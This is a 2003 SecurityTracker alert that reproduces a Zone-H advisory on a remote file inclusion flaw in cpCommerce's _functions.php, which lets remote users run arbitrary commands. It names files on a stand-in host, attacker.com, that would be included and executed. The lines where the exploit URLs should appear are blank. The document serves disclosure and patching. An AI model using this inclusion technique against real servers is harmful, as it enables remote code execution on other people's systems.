cpCommerce Include File Flaw Lets Remote Users Execute Arbitrary Commands on the Target System
SecurityTracker Alert ID: 1007957|
SecurityTracker URL: http://securitytracker.com/id/1007957
(Links to External Site)
Date: Oct 20 2003
Execution of arbitrary code via network, User access via network|
Vendor Confirmed: Yes Exploit Included: Yes |
Zone-H reported an include file vulnerability in cpCommerce. A remote user can execute arbitrary commands on the target server.|
The _functions.php file includes some files relevant to the $prefix variable. A remote user can specify a remote location for the $prefix variable to include and execute arbitrary files on the target server.
A demonstration exploit URL is provided:
PHP code, including operating system commands, in the remote file will be executed on the target system. The code will run with the privileges of the target web server process.
A remote user can execute arbitrary PHP code, including operating system commands, on the target system with the privileges of the target web server.|
No solution was available at the time of this entry.|
The vendor had reportedly issued a fix at the following URL, but at the time of this entry, the vendor had retracted the fix as well as the entire web site:
Vendor URL: cpcommerce.org/forums/index.php?board=2;action=display;threadid=864 (Links to External Site)
Input validation error|
Linux (Any), UNIX (Any), Windows (Any)|
Source Message Contents
Date: Sun, 19 Oct 2003 12:11:17 +0200|
Subject: ZH2003-31SA (security advisory): file inclusion vulnerability in
ZH2003-31SA (security advisory): file inclusion vulnerability in cpCommerce
Published: 19 October 2003
Name: cpCommerce Affected Versions: 0.05f (and other versions?)
Issue: file inclusion vulnerability
Author: Astharot (at Zone-H.org)
Zone-H Security Team has discovered a flaw in cpCommerce. cpCommerce "is an
open-source e-commerce solution that is entirely template and module based.".
There's a file inclusion vulnerability in the _functions.php file, line 13-14:
Is it possible for a remote attacker to include an external file and execute
arbitrary commands with the privileges of the webserver (nobody by default).
To test the vulnerability try this:
In this way the file "http://www.attacker.com/index_config.php" or
"http://www.attacker.com/index_gateways.php" will be included and executed on
The author has been contacted and he published a temporary fix in the cpCommerce
website forum, waiting for the new version.
The patch is avaible here:
Fix the script with the patch proposed by the author.
Link to ariginal article here:
Astharot - Zone-H Admin
http://www.zone-h.org - email@example.com
PGP Key: http://www.gife.org/astharot.asc
Linux User #292132